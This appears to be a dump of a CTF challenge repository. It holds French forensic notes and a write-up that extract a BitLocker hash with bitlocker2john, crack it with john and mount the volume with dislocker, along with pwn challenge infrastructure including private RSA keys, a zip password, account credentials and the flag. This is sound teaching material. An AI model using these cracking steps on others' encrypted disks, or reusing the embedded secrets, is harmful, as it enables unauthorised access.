├── CaptureTheFIC2020_Quals ├── forensic │ ├── doc.txt │ ├── extradisk.raw │ ├── short.txt │ └── wu_notfound.md └── pwn │ ├── Dockerfile │ ├── build.sh │ ├── certificates │ ├── clean.sh │ ├── client.crt │ ├── client.pem │ ├── generate_keys.sh │ ├── server.crt │ └── server.pem │ ├── chall │ ├── .gdb_history │ ├── doc.txt │ ├── heapme │ └── libc-2.23.so │ ├── create_zip_for_players.sh │ ├── flag.txt │ ├── run.sh │ ├── secret_ressources │ ├── .gdb_history │ ├── Makefile │ ├── exploit.py │ ├── exploit.py.sos │ ├── heapme │ ├── heapme.cpp │ └── requirements.txt │ ├── solutions │ ├── Shiro.md │ ├── geluchat.py │ ├── laxa.py │ └── uaf.py │ ├── test_player │ ├── 8e23eca76cbfdb90988a5b92577c147c.zip │ ├── client.pem │ ├── doc.txt │ ├── hash.txt │ ├── heapme │ ├── libc-2.23.so │ └── server.crt │ └── zip_hash.txt ├── CyberAfricaForum_2021 ├── binary │ ├── babi_reverse │ └── calc_reverse ├── forensic │ ├── Security.evtx │ ├── auth.log │ ├── crack_me_if_you_can.zip │ └── gocryptfs_bruteforce.zip └── network │ └── voip.pcap ├── README.md ├── breizh2k18_easy_mips ├── Dockerfile ├── README.md ├── README.txt ├── chall │ ├── Makefile │ ├── easy_mips.tar │ ├── exploit.py │ ├── flag │ ├── init.sh │ ├── inittab │ ├── install.sh │ ├── main.c │ ├── post_install_mips.sh │ ├── start_arm_now_mips.sh │ └── vuln ├── docker.sh └── regenerate_flag.sh └── breizh2k19 ├── go_reverse ├── .gdb_history ├── Makefile ├── flag.txt ├── gogo ├── main.go ├── peda-session-gogo.txt └── solution.txt └── reverse_ppc ├── generate_flag ├── generate_flag.c ├── main.c └── sh /CaptureTheFIC2020_Quals/forensic/doc.txt: -------------------------------------------------------------------------------- 1 | user: 2 | bosal43833 3 | bosal43833@mailt.top 4 | 5 | pass: 6 | bosal43833@mailt.top 7 | 8 | qemu-img create -f raw extradisk.raw 150M 9 | https://www.suares.com/index.php?page_id=25&news_id=209 10 | 11 | 12 | link to the flag => 13 | https://gist.github.com/bosal43833/3e815abc3f92e45963a8aafc8acfe411 14 | 15 | 
losetup /dev/loop0 extradisk.raw 16 | dislocker /dev/loop0 -upassword -- /media/bitlocker 17 | 18 | raw to vmdk 19 | qemu-img convert -f raw -O vmdk extradisk.raw image.vmdk 20 | 21 | losetup /dev/loop0 image.vmdk 22 | 23 | losetup -o 65536 /dev/loop1 /dev/loop0 24 | dislocker /dev/loop1 -upassword -- /media/bitlocker 25 | mount -o loop /media/bitlocker/dislocker-file /media/bitlockermount 26 | 27 | # ou alors 28 | # dislocker extradisk.raw -O 65536 -upassword -- /media/bitlocker/ 29 | 30 | binwalk /media/bitlocker/dislocker-file 31 | 32 | 33 | 34 | github repo: 35 | https://github.com/bosal43833/264f074405496b5f1df00b45ef3897c3 36 | 37 | L'objectif est d'ouvrir le bitlocker en devinant que le mot de passe est "password", puis ensuite utiliser n'importe quel outil de récupération de fichier supprimé pour trouver un zip contenant l'url du challenge d'après. tout ceci se fait simplement avec sous linux avec dislocker et bulk_extractor. 38 | 39 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/forensic/extradisk.raw: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/CaptureTheFIC2020_Quals/forensic/extradisk.raw -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/forensic/short.txt: -------------------------------------------------------------------------------- 1 | fdisk -l extradisk.raw 2 | # we see start => 128 and secort size is 512 3 | # so start is => 512 * 128 => 0x10000 => 65536 4 | 5 | losetup /dev/loop0 extradisk.raw 6 | losetup -o 65536 /dev/loop1 /dev/loop0 7 | dislocker /dev/loop1 -upassword -- /media/bitlocker 8 | mount -o loop /media/bitlocker/dislocker-file /media/bitlockermount 9 | 10 | bulk_extractor /media/bitlocker/dislocker-file -o o/ 11 | 12 | 13 | # clean 14 | umount /media/bitlockermount 15 | umount 
/media/bitlocker 16 | losetup -d /dev/loop1 17 | losetup -d /dev/loop0 18 | 19 | https://hub.docker.com/r/hypnza/misc-binaries 20 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/forensic/wu_notfound.md: -------------------------------------------------------------------------------- 1 | Writeup forensic # by Notfound 2 | 3 | >>> mmls 76b0c868ab7397cc6a0c0a1e107e3079.raw 4 | DOS Partition Table 5 | Offset Sector: 0 6 | Units are in 512-byte sectors 7 | 8 | Slot Start End Length Description 9 | 000: Meta 0000000000 0000000000 0000000001 Primary Table (#0) 10 | 001: ------- 0000000000 0000000127 0000000128 Unallocated 11 | 002: 000:000 0000000128 0000198783 0000198656 NTFS / exFAT (0x07) 12 | 003: ------- 0000198784 0000204799 0000006016 Unallocated 13 | 14 | On voit une partition NTFS qui commence à l'offset 128 et termine à l'offset 198783. Du coup j'utilise dd (cc @saxx) 15 | 16 | >>> dd if=76b0c868ab7397cc6a0c0a1e107e3079.raw of=ntfs_part.raw bs=512 skip=128 count=198783 17 | 198783+0 enregistrements lus 18 | 198783+0 enregistrements écrits 19 | 101776896 octets (102 MB, 97 MiB) copiés, 1,89805 s, 53,6 MB/s 20 | 21 | >>> file ntfs_part.raw 22 | ntfs_part.raw: DOS/MBR boot sector, code offset 0x58+2, OEM-ID "-FVE-FS-", sectors/cluster 8, reserved sectors 0, Media descriptor 0xf8, sectors/track 63, heads 16, hidden sectors 128, FAT (32 bit), sectors/FAT 8160, serial number 0x0, unlabeled; NTFS, sectors/track 63, physical drive 0x1fe0, $MFT start cluster 393217, serial number 02020454d414e204f, checksum 0x41462020 23 | 24 | Je remarque rapidement le flag -FVE-FS- qui me fait souvenir d'un bitlocker. Du coup, bah go bitlocker2john : 25 | 26 | >>> bitlocker2john -i ntfs_part.raw >> hash_bitlocker 27 | >>> cat hash_bitlocker 28 | ... 
29 | User Password hash: 30 | $bitlocker$0$16$6946a04b89585fea10b4817c9a3917c9$1048576$12$c0297b4057a9d50103000000$60$724b0b483ed7b6c3cef283d34830adb006f1ae732a39b2eccf84959b53a1735fb9cb2f67e88282ccf5b1a04cc0a74d84778097b2db1cb689a70bfd79 31 | Hash type: User Password with MAC verification (slower solution, no false positives) 32 | $bitlocker$1$16$6946a04b89585fea10b4817c9a3917c9$1048576$12$c0297b4057a9d50103000000$60$724b0b483ed7b6c3cef283d34830adb006f1ae732a39b2eccf84959b53a1735fb9cb2f67e88282ccf5b1a04cc0a74d84778097b2db1cb689a70bfd79 33 | Hash type: Recovery Password fast attack 34 | $bitlocker$2$16$b95e642d93ec40c16a7a77b87bc3cadf$1048576$12$c0297b4057a9d50106000000$60$60f1218fafabac6be20ecf31565d4e15f3e0ef3b5650e6d30535f7bd08eed2c6dc0992252927140339b470b794a6f2338b07369d1ec9e969d677b262 35 | Hash type: Recovery Password with MAC verification (slower solution, no false positives) 36 | $bitlocker$3$16$b95e642d93ec40c16a7a77b87bc3cadf$1048576$12$c0297b4057a9d50106000000$60$60f1218fafabac6be20ecf31565d4e15f3e0ef3b5650e6d30535f7bd08eed2c6dc0992252927140339b470b794a6f2338b07369d1ec9e969d677b262 37 | 38 | J'ai laissé tourner à peine 1 minute, puis j'ai mount le volume avec dislocker : 39 | 40 | >>> john --show hash_bitlocker 41 | ?:password 42 | ?:password 43 | >>> mkdir mountpoint_bitlocker 44 | >>> dislocker -V ntfs_part.raw -v -u mountpoint_bitlocker/ 45 | Enter the user password: 46 | >>> mount |grep bitlock 47 | dislocker on /home/notfound/CHALLENGES/FIC2020/FIC/mountpoint_bitlocker type fuse.dislocker (rw,nosuid,nodev,relatime,user_id=1000,group_id=100) 48 | 49 | On a maintenant une image disk "non chiffrée". 
Donc forensic classique : 50 | 51 | >>> fls dislocker-file 52 | r/r 4-128-4: $AttrDef 53 | r/r 8-128-2: $BadClus 54 | r/r 8-128-1: $BadClus:$Bad 55 | r/r 6-128-4: $Bitmap 56 | r/r 7-128-1: $Boot 57 | d/d 11-144-4: $Extend 58 | r/r 2-128-1: $LogFile 59 | r/r 0-128-1: $MFT 60 | r/r 1-128-1: $MFTMirr 61 | r/r 9-128-8: $Secure:$SDS 62 | r/r 9-144-11: $Secure:$SDH 63 | r/r 9-144-5: $Secure:$SII 64 | r/r 10-128-1: $UpCase 65 | r/r 3-128-3: $Volume 66 | r/r 39-128-1: flag.txt 67 | d/d 35-144-6: System Volume Information 68 | -/r * 64-128-2: ls 69 | -/r * 65-128-2: fic.zip 70 | -/r * 66-128-2: f1.zip 71 | -/r * 67-128-2: f2.zip 72 | -/r * 68-128-2: f3.zip 73 | -/r * 69-128-2: f4.zip 74 | V/V 256: $OrphanFiles 75 | 76 | Le fichier fic.zip a l'air intéressant, affichons le : 77 | 78 | >>> icat dislocker-file 66-128-2 | icat dislocker-file 66-128-2 | gzip -dc 79 | https://gist.github.com/bosal43833/3e815abc3f92e45963a8aafc8acfe411 80 | 81 | Pwned. Merci au revoir. 82 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ctfchaignc/xenial_socat 2 | # FROM ubuntu:xenial 3 | 4 | RUN useradd -ms /bin/bash ctf 5 | # RUN apt update -y && apt install openssl 6 | 7 | COPY ./chall /chall 8 | COPY ./flag.txt / 9 | 10 | COPY ./certificates /certs 11 | RUN chown ctf -R /certs/ && chmod 600 /certs/*.* 12 | 13 | USER ctf 14 | 15 | EXPOSE 4242/tcp 16 | 17 | CMD socat -d openssl-listen:4242,reuseaddr,fork,cert=/certs/server.pem,cafile=/certs/client.crt EXEC:/chall/heapme 18 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/build.sh: -------------------------------------------------------------------------------- 1 | docker build . 
-t fic_pwn 2 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/certificates/clean.sh: -------------------------------------------------------------------------------- 1 | rm -rf *.crt *.pem *.key 2 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/certificates/client.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDazCCAlOgAwIBAgIUU+U67+J3MSRyPm3Xh77DwO5k8dEwDQYJKoZIhvcNAQEL 3 | BQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM 4 | GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0xOTEyMTExNzIwMjFaFw0yOTEy 5 | MTExNzIwMjFaMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw 6 | HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggEiMA0GCSqGSIb3DQEB 7 | AQUAA4IBDwAwggEKAoIBAQC4ffFutGs+jf5lS64+Wl1crRJciuL4Ws9pAmHF0WSD 8 | T33r7k8Afl60MLv/2TNgo+UXOaRqWMru3rlAJsS9mb2wdsDIiKOJU2Hivhe/KNBk 9 | hbRL4dIkWrkFdHKEboH+11S933su9goHQd+3SC5kC0kvcykT+/uE3yZnRLav0e6j 10 | PmAdEo5Ws/ub7syE73HQoDAJbJrKloI4Jg/ilybqujEbZ4PRUmKNukGbf8hYFzWB 11 | k+FdZdzibcQAK7WZ188IIkRzKyDaSktBRJMqe7mf7JDvTqDbmMFkRXiPPCSfb6rJ 12 | eFaKzdscDw9S5ceQW/urdVFFKI+7iFUNKgPmy/jFHWZdAgMBAAGjUzBRMB0GA1Ud 13 | DgQWBBTTmSmFlbFs0GvN8gil9YHm8ahaXDAfBgNVHSMEGDAWgBTTmSmFlbFs0GvN 14 | 8gil9YHm8ahaXDAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQCO 15 | sDJ8sm1APzm4Ick3QuYJNDiTqJo3zCYTKLxr6sSgA+N9GC5knrtEnYQNbd1C8aTA 16 | XdyvPQRio6S6/Di5iFwWM58yMunW3iA5OtqPUu4A6YmG8Qpzx3CglbOw0EjTICwa 17 | h2WuAk43KlsmpAWPWqts3sfL/8rRp/3LvNx0hrroCouTiB4Bi+nDOjvitlJngfyo 18 | +bqNJsEtscvCDZPG2YL1qheiGHWHT4YkBAVv8HDyCzPduWOe+ajACybHEXPFr69v 19 | JIRI7YCzdJJuxqU9Q3a9ZgJ6x0zVUFOUBQcxcN923zo+80KY6B4ZlTQnXy9PD+aF 20 | wLPtqs6gc01QP/V/k4+e 21 | -----END CERTIFICATE----- 22 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/certificates/client.pem: 
-------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | MIIEpAIBAAKCAQEAuH3xbrRrPo3+ZUuuPlpdXK0SXIri+FrPaQJhxdFkg0996+5P 3 | AH5etDC7/9kzYKPlFzmkaljK7t65QCbEvZm9sHbAyIijiVNh4r4XvyjQZIW0S+HS 4 | JFq5BXRyhG6B/tdUvd97LvYKB0Hft0guZAtJL3MpE/v7hN8mZ0S2r9Huoz5gHRKO 5 | VrP7m+7MhO9x0KAwCWyaypaCOCYP4pcm6roxG2eD0VJijbpBm3/IWBc1gZPhXWXc 6 | 4m3EACu1mdfPCCJEcysg2kpLQUSTKnu5n+yQ706g25jBZEV4jzwkn2+qyXhWis3b 7 | HA8PUuXHkFv7q3VRRSiPu4hVDSoD5sv4xR1mXQIDAQABAoIBAA0KGb5RUiMhthFC 8 | wBX4HREnylxwFIqpIG+zk2V/3zLIs4WxWjQWumrR5ve2SkNSUibKFCzQCcfIRh+a 9 | nd0ouJd4TTffMG/MTObRuKvyHoh8SrnyQ//9yYXxLQbfKKDyZzLkULiI+zx4E2/I 10 | 0j6P7aRE52paLPS/MN+ro53ZoJw49YDj9JPLlTbwiDdQjJc1iTszzuz0kJpIKdVF 11 | mIw80AtW6cOG6ZwbRhL+JB6obGB20R9v6A3up1/x9L15Ocp3CROVjUdV1vpwcUny 12 | rMnSYFlA2Z34stkVxpzvEFE9Jz3YxMJk9ThAMCXrMiAAFzMkLsRtAuJ4bn592nU6 13 | t5aE/wECgYEA8JwwwaIlA0X8dRM4q96T5Ojigl6bj9YrnxHrTgTYj4C6MxkZgR9f 14 | LJjwHiJwilAMfOAknImUt575Qo0gtnJUttFiSR/lqOdNl7rN3aYn3zSKGIE84R2z 15 | DT7FNEuAkerU4QyKqKvzjCIeTO3Ku3rwET+pKIF9mb/6531DVvUnO8kCgYEAxErc 16 | MRXSHqmizYEliPF9A+bIUdumMMnW14iiPZrc+SPMbOG/AfuSOrAXAl9nRlYM1OPG 17 | XTSp41aDGjXyYjgF8581HqSOSehdy42GlBmmEQgThHBWhmwemENUKVjv9HLBYWwK 18 | LpzoM7Wt1RjwWvtGzXkhQ+JQiWYlVNYDuS1xN/UCgYEA1dPYuJxijFAsFddpK8R4 19 | ZpxYgEeXs/I/ffQsy38e/hkGYNbThZ7dtAKOkhlFLoYJMwj3QG48Thrnpa9J/RoK 20 | ExZtZFMGhF5a5JbM0UgScxh8CV8BPYZpU0IPe3QF5KdvXDkLGO8HV+gSSYeh/Y85 21 | vfp3WFoLxxGH5yW5LJRds5ECgYBXj1UdiDBMgTsgFIXbym0LunyNFz/Q75goWMiW 22 | VmhPskpUH3cGuWOHTllVM51r4KKkrF4l4YIO6N5eaMYQThFJlTEq1BismzyLujvY 23 | AID1g/bA0yOlnsEfBpmaQBP5pN7iSEFafZ+OwXIjZpaA3ym8KlZOY7utLqVkbHsI 24 | tV6VqQKBgQCp9KtVPG8MMNBfTeXqEiKUpNaxgyWjC32SCXYfMwPmEdN1Ndlrt0ts 25 | oUAeYP6AFYBfVR+fFreVXvdaOrBQuF1nf1dBd2E085v/BXhV/rY2W9EKL3F7Ju7d 26 | l6BTOSbxHD1Ctn3D7NwWCpVSqqxlIf+1NiBSwC4iuLeBDfkglteZPA== 27 | -----END RSA PRIVATE KEY----- 28 | -----BEGIN CERTIFICATE----- 29 | MIIDazCCAlOgAwIBAgIUU+U67+J3MSRyPm3Xh77DwO5k8dEwDQYJKoZIhvcNAQEL 30 | 
BQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM 31 | GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0xOTEyMTExNzIwMjFaFw0yOTEy 32 | MTExNzIwMjFaMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw 33 | HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggEiMA0GCSqGSIb3DQEB 34 | AQUAA4IBDwAwggEKAoIBAQC4ffFutGs+jf5lS64+Wl1crRJciuL4Ws9pAmHF0WSD 35 | T33r7k8Afl60MLv/2TNgo+UXOaRqWMru3rlAJsS9mb2wdsDIiKOJU2Hivhe/KNBk 36 | hbRL4dIkWrkFdHKEboH+11S933su9goHQd+3SC5kC0kvcykT+/uE3yZnRLav0e6j 37 | PmAdEo5Ws/ub7syE73HQoDAJbJrKloI4Jg/ilybqujEbZ4PRUmKNukGbf8hYFzWB 38 | k+FdZdzibcQAK7WZ188IIkRzKyDaSktBRJMqe7mf7JDvTqDbmMFkRXiPPCSfb6rJ 39 | eFaKzdscDw9S5ceQW/urdVFFKI+7iFUNKgPmy/jFHWZdAgMBAAGjUzBRMB0GA1Ud 40 | DgQWBBTTmSmFlbFs0GvN8gil9YHm8ahaXDAfBgNVHSMEGDAWgBTTmSmFlbFs0GvN 41 | 8gil9YHm8ahaXDAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQCO 42 | sDJ8sm1APzm4Ick3QuYJNDiTqJo3zCYTKLxr6sSgA+N9GC5knrtEnYQNbd1C8aTA 43 | XdyvPQRio6S6/Di5iFwWM58yMunW3iA5OtqPUu4A6YmG8Qpzx3CglbOw0EjTICwa 44 | h2WuAk43KlsmpAWPWqts3sfL/8rRp/3LvNx0hrroCouTiB4Bi+nDOjvitlJngfyo 45 | +bqNJsEtscvCDZPG2YL1qheiGHWHT4YkBAVv8HDyCzPduWOe+ajACybHEXPFr69v 46 | JIRI7YCzdJJuxqU9Q3a9ZgJ6x0zVUFOUBQcxcN923zo+80KY6B4ZlTQnXy9PD+aF 47 | wLPtqs6gc01QP/V/k4+e 48 | -----END CERTIFICATE----- 49 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/certificates/generate_keys.sh: -------------------------------------------------------------------------------- 1 | set -e 2 | sh clean.sh 3 | generate_keys() { 4 | if [ ! 
"$#" -gt 0 ]; then echo "ERROR Usage: server or client"; exit ; fi 5 | FILENAME=$1 6 | # openssl genrsa -out $FILENAME.key 1024 7 | openssl genrsa -out $FILENAME.key 2048 8 | openssl req -new -key $FILENAME.key -x509 -days 3653 -out $FILENAME.crt -batch 9 | cat $FILENAME.key $FILENAME.crt >$FILENAME.pem 10 | chmod 600 $FILENAME.key $FILENAME.pem 11 | rm $FILENAME.key 12 | } 13 | 14 | generate_keys server 15 | generate_keys client 16 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/certificates/server.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDazCCAlOgAwIBAgIUDMCIiz4Z5cL8z9a/F09/Zc7O7zMwDQYJKoZIhvcNAQEL 3 | BQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM 4 | GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0xOTEyMTExNzIwMjFaFw0yOTEy 5 | MTExNzIwMjFaMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw 6 | HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggEiMA0GCSqGSIb3DQEB 7 | AQUAA4IBDwAwggEKAoIBAQDHmd6vjAO9qBaEtJB+hSQetQn0EFCJ0fpVpENubjFK 8 | 3Es6UBaERtmKAvzNsfThQf1CZAL3jD237mqHTpbqg2v+WLL8c9qPcWmNDzg1Ix62 9 | sEfvwaN4oYCYe/q1VcthCUawSMjxV9EhJsbjJC4BBZCxDuleuNXTzjD/Bl7zIqJO 10 | 8Kxkc/gMeE5b6sQPOx6zla4fRxa9wNAqjdasXBotyzsyHkFOzQpHOpjMExHenIfu 11 | Rs3A9pkgubi6kfMdvphZxbbVnAkb1n19YalhYd7dQKBtMakOezuVrG024p2XQVpJ 12 | ZH+qrhjNz0V2wwazSZzsEkS7kYBV0wtT90eLYZVKzP2bAgMBAAGjUzBRMB0GA1Ud 13 | DgQWBBQ5QMn7/13sP90X/0ovikRqvvuyaTAfBgNVHSMEGDAWgBQ5QMn7/13sP90X 14 | /0ovikRqvvuyaTAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQAm 15 | MeTnFLNNRIzqciK8CXyi07ZifPiyXxouR5rw3368KU6DSrX8Ehkn/a+Ldx783+93 16 | +alXeRkEk1NiSNKuGkpBIF/6FKhh+3y7TUikyNW7urQIfTsw2ZQk/BKM3qQwRauH 17 | RczDKmM9ClHQbFu+1nbddiR7l8P4SDGwsSOXhtlItIJ4Y7MixJsPJT5eUq4kSGfZ 18 | 5+rgIniz4V00Iz47Uxn88FBzTxQaejUEXVbrtTbijmNddByMjbZ/TNz+J1SwjckN 19 | rSjpClOkCeW1U4LrrezgOZ15FzQgE7LT7BghqQtjWDZvnMjjUgmYGOt8MS9JtLY/ 20 | SeSwLTw6i2lmaMDWJyxt 21 | -----END CERTIFICATE----- 22 
| -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/certificates/server.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | MIIEogIBAAKCAQEAx5ner4wDvagWhLSQfoUkHrUJ9BBQidH6VaRDbm4xStxLOlAW 3 | hEbZigL8zbH04UH9QmQC94w9t+5qh06W6oNr/liy/HPaj3FpjQ84NSMetrBH78Gj 4 | eKGAmHv6tVXLYQlGsEjI8VfRISbG4yQuAQWQsQ7pXrjV084w/wZe8yKiTvCsZHP4 5 | DHhOW+rEDzses5WuH0cWvcDQKo3WrFwaLcs7Mh5BTs0KRzqYzBMR3pyH7kbNwPaZ 6 | ILm4upHzHb6YWcW21ZwJG9Z9fWGpYWHe3UCgbTGpDns7laxtNuKdl0FaSWR/qq4Y 7 | zc9FdsMGs0mc7BJEu5GAVdMLU/dHi2GVSsz9mwIDAQABAoIBAELrH3GTa52mQQZ0 8 | 0wzX7mgtIg0lexr5vwf/bmwTnYsPmFkQiLwIVN6kacU8qHDtAs/DYAtGhVqpICYE 9 | /yvYq9g2PKvO27PDvjOAqsOF5sIxD60eKoRDAS4eQsuQ3ALIbV6kyFnBq2eF7KAy 10 | fQnyp7P03+DV7zp3oo2dwS+aqPf1uAaF1Hf67QcOttJSxFgD6jYKTunD9IrIRUn+ 11 | gcsLJQnUVXAWB4XLydL5rmTa3SsLb1xF2cExLYnEreNDc6Wn7YGlwJ/imr16SAuh 12 | pD073V1ADW6ECHeX2UteGCZzMx7cNGij2lQVsG9d2fRS3BFOl2fYb9l2cW4d2cRm 13 | RlrZQOECgYEA/WR2pAZfLJQUAVEOYfRvKEY5KibRNIuXSw8ypC7jKws5QdrsbFAu 14 | aYdOLzStGFIJNfYSqP1phwopQL4M+8Wzad/SeKSIxL08u+qRZwkMLLmLtys0AtJh 15 | eiNM2dyJxlEnO2fIjctNX5+omc1i2GrOik8woDQzMVq0NXKAfGP8p/UCgYEAyaey 16 | 0aYxTt71N+UqGKpcmuP0L+7Apma/jQhDGJTqlCwBS6WEh9Rto7+UEwKQGwwJ1WhO 17 | o6uw9dxgxykCw2MkNOTJBnNCCjb5eWVdTyfz09WbSalI6U5bk7t2Z7mnG7STuh1s 18 | YfOj6coS6BiBNhQtrQT22mxl+zJEnCkwwmPb5U8CgYAmrPXa1UojkLp49PlABEIP 19 | IKDLCT+3SHMgNsKhArMTt9PWdGbPpXFgFBHf7Kda5fKX9OYmOv+nZ+qiAiATMbrP 20 | tyT12w8xED075XKqClx8WxmzLHn00E2micrKGfpBddOKIq4ezmAR71mZmBq1M6Aw 21 | xiOC4FTL/K8y1TY9RjmjHQKBgC8Gd3Hicq802TR+sXFtEQlhzUj8QVrMrTDDU3pB 22 | B+8jz+2HHL/cLvE3tN02BMr55LUqjOQoHq1HBh6LlsRfs0rOa36glC7zoPvJQpg5 23 | 9edZccwcuQ8HId3yomsP5UNVufl18RdqjLfxUrVjOYaV8AzgEnzfOGz6zPsps+Ax 24 | D0+LAoGAZO3++Y4tJOoCHVRE5y8oE604/8J/kFKIpJ8dcHpgET4lA7aKsP0+j8UE 25 | EggZNaLjSk/naB9AFFHNscpY8v9wrnshQJxaA9WiA9utb4RciqcshZW465Xy2DGZ 26 | LrdgLiGOOZ32MC0g7T6TfMk2A1/zKFcg/DOEeik5rpw0SwoR5Kw= 27 | -----END 
RSA PRIVATE KEY----- 28 | -----BEGIN CERTIFICATE----- 29 | MIIDazCCAlOgAwIBAgIUDMCIiz4Z5cL8z9a/F09/Zc7O7zMwDQYJKoZIhvcNAQEL 30 | BQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM 31 | GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0xOTEyMTExNzIwMjFaFw0yOTEy 32 | MTExNzIwMjFaMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw 33 | HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggEiMA0GCSqGSIb3DQEB 34 | AQUAA4IBDwAwggEKAoIBAQDHmd6vjAO9qBaEtJB+hSQetQn0EFCJ0fpVpENubjFK 35 | 3Es6UBaERtmKAvzNsfThQf1CZAL3jD237mqHTpbqg2v+WLL8c9qPcWmNDzg1Ix62 36 | sEfvwaN4oYCYe/q1VcthCUawSMjxV9EhJsbjJC4BBZCxDuleuNXTzjD/Bl7zIqJO 37 | 8Kxkc/gMeE5b6sQPOx6zla4fRxa9wNAqjdasXBotyzsyHkFOzQpHOpjMExHenIfu 38 | Rs3A9pkgubi6kfMdvphZxbbVnAkb1n19YalhYd7dQKBtMakOezuVrG024p2XQVpJ 39 | ZH+qrhjNz0V2wwazSZzsEkS7kYBV0wtT90eLYZVKzP2bAgMBAAGjUzBRMB0GA1Ud 40 | DgQWBBQ5QMn7/13sP90X/0ovikRqvvuyaTAfBgNVHSMEGDAWgBQ5QMn7/13sP90X 41 | /0ovikRqvvuyaTAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQAm 42 | MeTnFLNNRIzqciK8CXyi07ZifPiyXxouR5rw3368KU6DSrX8Ehkn/a+Ldx783+93 43 | +alXeRkEk1NiSNKuGkpBIF/6FKhh+3y7TUikyNW7urQIfTsw2ZQk/BKM3qQwRauH 44 | RczDKmM9ClHQbFu+1nbddiR7l8P4SDGwsSOXhtlItIJ4Y7MixJsPJT5eUq4kSGfZ 45 | 5+rgIniz4V00Iz47Uxn88FBzTxQaejUEXVbrtTbijmNddByMjbZ/TNz+J1SwjckN 46 | rSjpClOkCeW1U4LrrezgOZ15FzQgE7LT7BghqQtjWDZvnMjjUgmYGOt8MS9JtLY/ 47 | SeSwLTw6i2lmaMDWJyxt 48 | -----END CERTIFICATE----- 49 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/chall/.gdb_history: -------------------------------------------------------------------------------- 1 | "rofi -show drun -font \\"DejaVu 9\\" -run-shell-command '{terminal} -e \\" {cmd}; read -n 1 -s\\"'" 2 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/chall/doc.txt: -------------------------------------------------------------------------------- 1 | socat stdio openssl-connect:ctf.hexpresso.fr:4242,cert=client.pem,cafile=server.crt,verify=0 
2 | 3 | You know the drill, let's pwn the planet. 4 | 5 | # Hexpresso / @chaignc 6 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/chall/heapme: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/CaptureTheFIC2020_Quals/pwn/chall/heapme -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/chall/libc-2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/CaptureTheFIC2020_Quals/pwn/chall/libc-2.23.so -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/create_zip_for_players.sh: -------------------------------------------------------------------------------- 1 | zip -e --password powell82435 -j for_the_players.zip \ 2 | ./chall/* \ 3 | ./certificates/client.pem \ 4 | ./certificates/server.crt 5 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/flag.txt: -------------------------------------------------------------------------------- 1 | 5c141765db003a82e9a9978566b6d78f@hexpresso.fr 2 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/run.sh: -------------------------------------------------------------------------------- 1 | docker run -p 4242:4242 -it fic_pwn 2 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/secret_ressources/.gdb_history: -------------------------------------------------------------------------------- 1 | attach 30398 2 | telescope 0x55b024d262b0 3 | telescope 0x55b024d262d0 4 | telescope 0x55b024d26310 5 | telescope 0x55b024d262f0 6 | c 7 
